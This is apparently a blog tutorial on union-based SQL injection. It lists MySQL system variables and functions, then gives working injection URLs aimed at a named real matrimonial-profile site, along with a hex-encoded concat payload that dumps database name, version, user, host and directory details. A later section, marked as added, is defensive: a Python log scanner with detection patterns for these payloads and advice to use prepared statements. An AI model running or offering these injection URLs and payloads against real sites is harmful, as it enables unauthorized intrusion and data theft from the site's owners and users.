Today I will show you how to print multiple variables and functions in SQL injection:
Here is the cheat sheet of multiple functions on screen:
@@port : Check port
@@version_compile_os : Check which operating system is running
@@CHARACTER_SET_FILESYSTEM : Tells the file system
@@version_compile_machine : Check 32-bit/64-bit
@@hostname : Current hostname
@@tmpdir : Temp directory
@@datadir : Data directory
@@version : Version of DB
@@basedir : Base directory
user() : Current user
database() : Current database
version() : Version
schema() : Current database
UUID() : System UUID key
current_user() : Current user
current_user : Current user
system_user() : Current system user
session_user() : Session user
@@GLOBAL.have_symlink : Check if symlink is enabled or disabled
@@GLOBAL.have_ssl : Check if it has SSL or not
Procedure:
For this purpose we need a vulnerable site:
http://www.pelli.co.in/view_profile_byid.php?id=-15180 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
Here you can see a lot of vulnerable columns:
Now we are going to print database(), version(), user(), @@port, etc.:
-----------------------------------------------------------------------------------------------------------------------
- http://www.pelli.co.in/view_profile_byid.php?id=-15180 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
- http://www.pelli.co.in/view_profile_byid.php?id=-15180 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
- http://www.pelli.co.in/view_profile_byid.php?id=-15180 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
Now we are going to print all functions at once. For this purpose we will use concat, concat_ws, or make_set:
----------------------------------------------------------------------------------------------------------------------
concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e,0x3c62723e,0x7e7e696e6a6563742062792041666768616e697e7e3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e64617461626173653d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,database(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e76657273696f6e3d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,version(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e757365723d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,user(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e506f72743d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@port,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4f533d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@version_compile_os,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e424954532044455441494c533d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d626c75653e,@@version_compile_machine,0x3c666f6e7420636f6c6f723d677265656e3e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e46494c452053595354454d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@CHARACTER_SET_FILESYSTEM,0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x686f73746e616d653d3d,@@hostname,0x3c62723e,0x53797374656d2075756964206b65793d3d,UUID(),0x3c62723e,0x73796d6c696e6b3d3d,@@GLOBAL.have_symlink,0x3c62723e,0x53534c3d3d,@@GLOBAL.have_ssl,0x3c62723e,0x426173656469726563746f72793d3d,@@basedir)
----------------------------------------------------------------------------------------------------------------------
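Seen from the server side, requests like the ones above leave a recognisable trail in the web access log: a UNION SELECT (often wrapped in a `/*!50000 ... */` versioned comment), the names from the cheat sheet, and long hex literals inside concat. The following is an added example, not part of the original post, that scans log lines for that pattern; the function names (`normalize`, `inspect`, `scan`), the severity labels and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Names from the cheat sheet above: MySQL system variables and info functions.
FINGERPRINT = re.compile(
    r"@@(?:global\.)?(?:port|version_compile_os|character_set_filesystem|"
    r"version_compile_machine|hostname|tmpdir|datadir|version|basedir|"
    r"have_symlink|have_ssl)\b"
    r"|\b(?:user|database|version|schema|uuid|current_user|system_user|"
    r"session_user)\s*\(\s*\)")
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b")
HEX_LITERAL = re.compile(r"\b0x[0-9a-f]{8,}\b")
REQUEST = re.compile(r'"(?:GET|POST) \S*?\?(\S*) HTTP/')

def normalize(query):
    text = unquote_plus(query)  # '+' and %xx back to characters
    # MySQL executes the body of /*!50000 ... */, so keep the body.
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # plain comment acts as a space
    return re.sub(r"\s+", " ", text).lower()

def inspect(query):
    text = normalize(query)
    names = sorted({m.group(0).replace(" ", "") for m in FINGERPRINT.finditer(text)})
    union = bool(UNION_SELECT.search(text))
    hexes = len(HEX_LITERAL.findall(text))
    severity = "high" if union and (names or hexes) else "medium" if union or names else "none"
    return {"severity": severity, "names": names, "hex_literals": hexes}

def scan(log_lines):
    # Return (line_number, finding) for every request that needs review.
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        finding = inspect(match.group(1)) if match else None
        if finding and finding["severity"] != "none":
            hits.append((number, finding))
    return hits

# Constructed sample lines; paths and addresses are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=42 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=union+station+select+menu HTTP/1.1" 200 733',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /item.php?id=-1+/*!50000UNION*/+ALL+SELECT+1,2,database(),4 HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Jan/2024:10:01:09 +0000] "GET /item.php?id=-1%20UnIoN/**/SELECT%201,concat(0x3c62723e3c62723e,@@version,@@GLOBAL.have_ssl),3 HTTP/1.1" 200 530',
]
if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```

Detection of this kind only tells you the parameter is being probed; the fix is to bind the `id` value as a parameter in a prepared statement so it can never be parsed as SQL.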